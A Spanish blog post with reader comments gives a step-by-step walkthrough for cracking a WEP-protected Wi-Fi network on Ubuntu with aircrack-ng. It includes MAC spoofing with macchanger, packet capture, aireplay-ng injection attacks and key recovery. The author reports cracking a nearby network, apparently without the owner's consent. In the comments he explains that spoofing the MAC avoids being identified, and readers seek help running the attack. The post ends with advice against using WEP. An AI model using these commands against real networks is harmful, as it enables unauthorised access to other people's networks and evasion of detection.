Como crackear una red wifi cifrada con WEP en Ubuntu

La verdad, es que Juanito hace tiempo que me picó con el tema del crackeo de redes inalámbricas. Tampoco le presté mucha más atención que la un simple pique absurdo. Sin embargo el otro día pensé, a ver si es muy difícil esto, y la verdad es que con Ubuntu no puede ser más sencillo.

Evidentemente, yo no lo utilizo para tener red gratis, más que nada por que yo tengo mi red de banda ancha conectada con mi RJ45.

Ahora la conclusión es inmediata, proteger una red inalámbrica con cifrado WEP es como dejar un caramelo en la puerta de un colegio.

Tengo que decir que he tardado menos de 5 minutos (y creo que exagero con el tiempo) en conseguir descifrar la contraseña de una red próxima, y no tengo que exagerar. Así que recomiendo a todos aquellos incautos que tengan la red protegida con WEP que se olviden y se pasen inmediatamente a WPA, o mejor que bloqueen las MAC que pueden acceder a su red.

Los pasos que seguí para hacer esta operación, fueron los siguientes:

1.- Instalé la suite aircrack-ng

sudo apt-get install aircrack-ng

2.- Instalé Macchanger

sudo apt-get install macchanger

3.- A partir de aquí me desconecté de la red wifi y ejecuté:

sudo airmon-ng start wlan0

aquí se puede ver que mon0 está activo

Thumbnail image

4.- Dí de baja mon0

sudo ifconfig mon0 down

5.- Operación enmascarado. Cambié la MAC de nuestra tarjeta de red, por una más molona:

sudo macchanger -m 00:11:22:33:44:55 mon0

6- Dí nuevamente de alta mon0, pero con su nueva dirección MAC:

sudo ifconfig mon0 up

7.- Escaneé las redes que había por la zona

sudo airodump-ng mon0

Thumbnail image

8.- Cuando encontré una que me gustaba, detuve la búsqueda con Ctrl-C. Para poder descifrar la contraseña, es necesario que la columna «#Data» de la red en cuestión sea distinto de cero, sino es que no hay transmisión de paquetes y no se puede hacer nada.

A partir de este momento, es cuando mi monitor se parece al de Matrix, todo lleno de ventanas negras con letras verdes. Pues a partir de ahora cada instrucción se corre en una nueva ventana.

9.- Abrí otro terminal y ejecuté airodump-ng, con los siguientes parámetros (sustituyendo los datos entre corchetes con los de la red en cuestión):

sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0

donde, todos los datos se sacan del punto 7:

CH es el canal

ESSID es el nombre de la red

BSSID es la dirección MAC

Thumbnail image

10.- Otro terminal, para ejecutar el ataque a la red:

sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0

donde:

BSSID es la dirección MAC

Thumbnail image

11.- Más terminales!!!!:

sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0

donde:

BSSID es la dirección MAC

Thumbnail image

12.- Ahora la última terminal, donde se obtiene la clave descifrada:

sudo aircrack-ng -z [ESSID]*.cap

donde:

ESSID es el nombre de la red

Una vez ejecuté el último punto se obtiene la clave en formato XX:XX:XX:XX:XX:XX. Ya está terminado, me costó unos segundos. Ya hemos crackeado la red.

Thumbnail image

Thumbnail image

La pantalla de Matrix:

Thumbnail image

Visto lo visto, no se te ocurra utilizar encriptación WEP para tu red, ya has visto lo fácil que es.

12 comentarios en “Como crackear una red wifi cifrada con WEP en Ubuntu

  1. nilla hace 11 años

    tengo un problema y es que el paso 10 me dice que el mon0 está en -1 y no me deja
    y otro problema que tengo es que cuando hago el paso 11 me pregunta todo el rato si quiero utilizar ese paquete

    me puedes echar una mano?¿
    gracias por adelantado 🙂

  2. Spidervicman hace 10 años

    tengo el mismo problema con el paso 10… ayuda por favor! dice que el canal del mon0 es -1 y no coincide con el canal de la AP… todo comienza en el paso 9. porq a un lado de la fecha sale: » fixed channel mon0: -1

  3. Hilas hace 10 años

    Alguna respuesta a los problemas anteriores ? yo tambien estoy con el mismo problema .. saludos 

  4. El atareao hace 10 años

    Hola @a7765bd336fd9b59780e6e3a51f0dd7c:disqus , @ab7f4f352e8ab25cd27921d6c28abe45:disqus y @c9bb095bf1d631476172649a45f7125d:disqus siento no haber contestado antes, pero estoy preparando un nuevo artículo un poco más extenso, desde hace un tiempo. Espero poder contestar en unos pocos días.
    Gracias

  5. javirk hace 10 años

    Mismo problema en el paso 10 que ellos (Spidervicman, nilla…) ¿Cómo se puede solucionar?

  6. Pablovelazco2489 hace 10 años

    pues estando linux beni para que batallar con 2 simples click y listo te dejas detantas cosas yo eh tardado 1 minuto en sacar la contra de las redes

  7. HilaS hace 10 años

    Bueno y que a pasado man ?  se hizo el atriculo nuevo o algun cambio referente al problema ? Saludoss !! 

  8. EmilioLM hace 7 años

    Una pregunta, es necesario cambiar el MAC o es posible omitir este paso?

    1. El atareao hace 7 años

      No es necesario, depende de si quieres ser identificado en la red auditada o no.

      Saludos

  9. Emilio Mejía hace 4 años

    Hola, agradezco grandemente tu post, me oriento de lleno y pude concluir todo a la perfección. En mi caso utilice un adaptador WIFI tipo USB maraca NEXXT.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *